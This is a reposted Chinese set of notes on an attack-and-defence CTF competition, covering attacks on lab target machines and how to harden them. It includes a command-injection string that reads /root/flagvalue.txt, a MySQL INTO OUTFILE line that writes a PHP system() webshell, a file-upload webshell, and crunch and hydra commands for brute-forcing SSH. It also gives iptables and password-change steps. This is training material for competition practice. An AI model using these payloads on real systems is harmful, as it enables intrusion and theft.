脚本宝典收集整理的这篇文章主要介绍了网络空间安全——攻防对抗 2.0,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
ftp攻击方式,查看本机有哪些普通用户
admin/123456和guest/123456
然后提交flag
使用session –I 查看已经获取到的连接
使用session –I 序号 获取连接
进入自己的网站根目录
DisplayDirectory.php
此页面用来查看文件夹内的内容
使用&&加上cat /root/flagvalue.txt查看别人的flag,然后通过修改url,可以快速拿分
加固
FileSharing.php 文件上传漏洞
Kali生成木马
找到存储木马的路径
木马路径
使用工具连接
加固
WebShell.php
加固
通过查看TestConn.php页面可获知数据库密码为root/root
攻击代码
select '<?php system($_GET['a']); ?>' INTO OUTFILE '/var/www/html/a.php';
攻击
加固漏洞
>use mysql;
>update user set Password=password('123456') where User='root';
修改密码即可
加固
写centos的iptables,关闭防火墙
清除防火墙预设规则
设置默认规则,拒绝所有进来的流量
设置默认规则,拒绝所有转发流量
设置默认规则,允许所有出去的流量
允许21,22,23,80,3306
保存防火墙规则
启动防火墙
查看结果
crunch 6 6 -t 0000%% > /passw
开始破解自己的密码
hydra -l root -P /passw -t 4 ssh://172.16.120.250
现在使用putty进去到自己的靶机
生成字典
调出网站后台破解工具
得出网站后台
攻击方法一致
加固方法需要谨慎
法1:shell脚本一次成型
法2:把防火墙规则写在防火墙配置文件里面
以上是脚本宝典为你收集整理的网络空间安全——攻防对抗 2.0全部内容,希望文章能够帮你解决网络空间安全——攻防对抗 2.0所遇到的问题。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。